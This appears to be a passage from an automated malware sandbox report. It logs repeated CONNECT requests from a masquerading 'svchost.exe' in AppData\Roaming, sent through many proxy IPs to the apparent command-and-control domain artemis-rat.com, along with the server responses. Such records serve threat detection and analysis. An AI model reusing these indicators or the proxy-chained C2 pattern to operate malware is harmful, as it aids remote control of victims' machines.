                                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 35 30 30 20 49 6e 74 65 72 6e 61 6c 20 53 65 72 76 65 72 20 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 49 6e 74 65 72 6e 61 6c 20 53 65 72 76 65 72 20 45 72 72 6f 72 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 73 65 72 76 65 72 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 61 6e 20 69 6e 74 65 72 6e 61 6c 20 65 72 72 6f 72 20 6f 72 0a 6d 69 73 63 6f 6e 66 69 67 75 72 61 74 69 6f 6e 20 61 6e 64 20 77 61 73 20 75 6e 61 62 6c 65 20 74 6f 20 63 6f 6d 70 6c 65 74 65 0a 79 6f 75 72 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 70 3e 50 6c 65 61 73 65 20 63 6f 6e 74 61 63 74 20 74 68 65 20 73 65 72 76 65 72 20 61 64 6d 69 6e 69 73 74 72 61 74 6f 72 20 61 74 20 0a 20 71 73 68 6e 40 6d 61 69 6c 2e 72 75 20 74 6f 20 69 6e 66 6f 72 6d 20 74 68 65 6d 20 6f 66 20 74 68 65 20 74 69 6d 65 20 74 68 69 73 20 65 72 72 6f 72 20 6f 63 63 75 72 72 65 64 2c 0a 20 61 6e 64 20 74 68 65 20 61 63 74 69 6f 6e 73 20 79 6f 75 20 70 65 72 66 6f 72 6d 65 64 20 6a 75 73 74 20 62 65 66 6f 72 65 20 74 68 69 73 20 65 72 72 6f 72 2e 3c 2f 70 3e 0a 3c 70 3e 4d 6f 72 65 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 20 61 62 6f 75 74 20 74 68 69 73 20 65 72 72 6f 72 20 6d 61 79 20 62 65 20 61 76 61 69 6c 61 62 6c 65 0a 69 6e 20 74 68 65 20 73 65 72 76 65 72 20 65 72 72 6f 72 20 6c 6f 67 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 35 36 20 28 44 65 62 69 61 6e 29 20 53 65 72 76 65 72 20 61 74 20 61 72 74 65 6d 69 73 2d 72 61 74 2e 63 6f 6d 20 50 6f 72 74 20 34 34 33 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>500 Internal Server Error</title></head><body><h1>Internal Server Error</h1><p>The server encountered an internal error ormisconfiguration and was unable to completeyour request.</p><p>Please contact the server administrator at qshn@mail.ru to inform them of the time this error occurred, and the actions you performed just before this error.</p><p>More information about this error may be availablein the server error log.</p><hr><address>Apache/2.4.56 (Debian) Server at artemis-rat.com Port 443</address></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3690192.168.2.56173172.195.114.169414556176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:38.058546066 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3691192.168.2.561702110.12.211.1408056176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:38.058547020 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3692192.168.2.561699185.158.114.142569756176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:38.065385103 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3693192.168.2.560484167.99.124.1188043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:38.071484089 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3694192.168.2.561820164.92.86.1136411056176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:38.104005098 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:38.677150011 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3695192.168.2.56171841.223.108.13108056176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:38.135885000 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3696192.168.2.56173845.138.87.238108056176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:38.144659996 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3697192.168.2.56186034.49.208.2218056176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:38.145734072 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3698192.168.2.56184564.225.48.234312856176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:38.195036888 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:38.849072933 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3699192.168.2.56178718.134.236.231312856176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:38.195036888 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:38.491087914 CET116INHTTP/1.1 200 OK
                                                                                    Date: Sat, 09 Mar 2024 12:14:38 GMT
                                                                                    Server: nginx
                                                                                    Content-Type: text/plain
                                                                                    Content-Length: 0


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3700192.168.2.561877172.67.181.328056176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:38.195439100 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:38.349749088 CET316INHTTP/1.1 400 Bad Request
                                                                                    Server: cloudflare
                                                                                    Date: Sat, 09 Mar 2024 12:14:38 GMT
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 155
                                                                                    Connection: close
                                                                                    CF-RAY: -
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                    Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3701192.168.2.56179095.164.89.123888856176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:38.197068930 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3702192.168.2.56183135.79.120.242312856176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:38.203224897 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:38.479047060 CET116INHTTP/1.1 200 OK
                                                                                    Date: Sat, 09 Mar 2024 12:14:38 GMT
                                                                                    Server: nginx
                                                                                    Content-Type: text/plain
                                                                                    Content-Length: 0


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3703192.168.2.56177578.30.128.10808043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:38.203651905 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3704192.168.2.561798195.90.216.75108056176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:38.205904007 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3705192.168.2.561814198.105.111.15669356176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:38.206207991 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:38.496293068 CET459INHTTP/1.1 407 Proxy Authentication Required
                                                                                    Proxy-Authenticate: Basic realm="Invalid proxy credentials or missing IP Authorization."
                                                                                    Proxy-Connection: close
                                                                                    X-Webshare-Error: 407
                                                                                    X-Webshare-Reason: invalidpassword
                                                                                    Date: Sat, 09 Mar 2024 12:14:38 GMT
                                                                                    Content-Length: 121
                                                                                    Content-Type: text/plain; charset=utf-8
                                                                                    Connection: close
                                                                                    Data Raw: 4e 6f 74 20 61 75 74 68 65 6e 74 69 63 61 74 65 64 20 6f 72 20 69 6e 76 61 6c 69 64 20 61 75 74 68 65 6e 74 69 63 61 74 69 6f 6e 20 63 72 65 64 65 6e 74 69 61 6c 73 2e 20 4d 61 6b 65 20 73 75 72 65 20 74 6f 20 75 70 64 61 74 65 20 79 6f 75 72 20 70 72 6f 78 79 20 61 64 64 72 65 73 73 2c 20 70 72 6f 78 79 20 75 73 65 72 6e 61 6d 65 20 61 6e 64 20 70 6f 72 74 2e
                                                                                    Data Ascii: Not authenticated or invalid authentication credentials. Make sure to update your proxy address, proxy username and port.


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3706192.168.2.561773111.90.150.109108056176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:38.208092928 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3707192.168.2.558588156.67.214.2328043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:38.210900068 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3708192.168.2.56177638.54.16.978056176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:38.215871096 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:38.561077118 CET176INHTTP/1.1 404 Not Found
                                                                                    Content-Type: text/plain; charset=utf-8
                                                                                    X-Content-Type-Options: nosniff
                                                                                    Date: Sat, 09 Mar 2024 12:14:38 GMT
                                                                                    Content-Length: 19
                                                                                    Data Raw: 34 30 34 20 70 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 0a
                                                                                    Data Ascii: 404 page not found


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3709192.168.2.56181546.17.63.166909156176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:38.215986967 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3710192.168.2.56181334.95.243.122808156176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:38.233091116 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3711192.168.2.561308115.74.157.191108043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:38.235837936 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3712192.168.2.561880162.223.94.1668056176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:38.274961948 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3713192.168.2.561883184.170.248.5414556176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:38.278984070 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3714192.168.2.561825117.30.118.200811856176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:38.284507036 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3715192.168.2.561853193.239.58.92808156176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:38.288505077 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3716192.168.2.55863351.75.126.1501969343312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:38.294075012 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3717192.168.2.56196743.153.175.4344356176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:38.296029091 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3718192.168.2.56196943.153.175.4344356176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:38.296878099 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3719192.168.2.56197043.153.175.4344356176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:38.299602985 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3720192.168.2.56197243.153.175.4344356176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:38.300992966 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3721192.168.2.561821103.49.114.195808056176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:38.305802107 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3722192.168.2.561906104.19.85.2148056176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:38.306858063 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:38.461416960 CET316INHTTP/1.1 400 Bad Request
                                                                                    Server: cloudflare
                                                                                    Date: Sat, 09 Mar 2024 12:14:38 GMT
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 155
                                                                                    Connection: close
                                                                                    CF-RAY: -
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                    Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3723192.168.2.56187618.135.133.1168056176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:38.326004028 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:38.617099047 CET116INHTTP/1.1 200 OK
                                                                                    Date: Sat, 09 Mar 2024 12:14:38 GMT
                                                                                    Server: nginx
                                                                                    Content-Type: text/plain
                                                                                    Content-Length: 0
                                                                                    Mar 9, 2024 13:14:38.618149996 CET177OUTData Raw: 16 03 03 00 ac 01 00 00 a8 03 03 65 ec 52 ad 43 11 60 25 09 dc c2 8e a8 6f ca 6c b7 37 f1 71 ea 87 90 0d 59 6d f4 49 4c b7 ae 6c 00 00 2a c0 2c c0 2b c0 30 c0 2f 00 9f 00 9e c0 24 c0 23 c0 28 c0 27 c0 0a c0 09 c0 14 c0 13 00 9d 00 9c 00 3d 00 3c
                                                                                    Data Ascii: eRC`%ol7qYmILl*,+0/$#('=<5/Uartemis-rat.com#


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3724192.168.2.56186527.65.114.8108043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:38.326498985 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3725192.168.2.561864138.36.150.15108043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
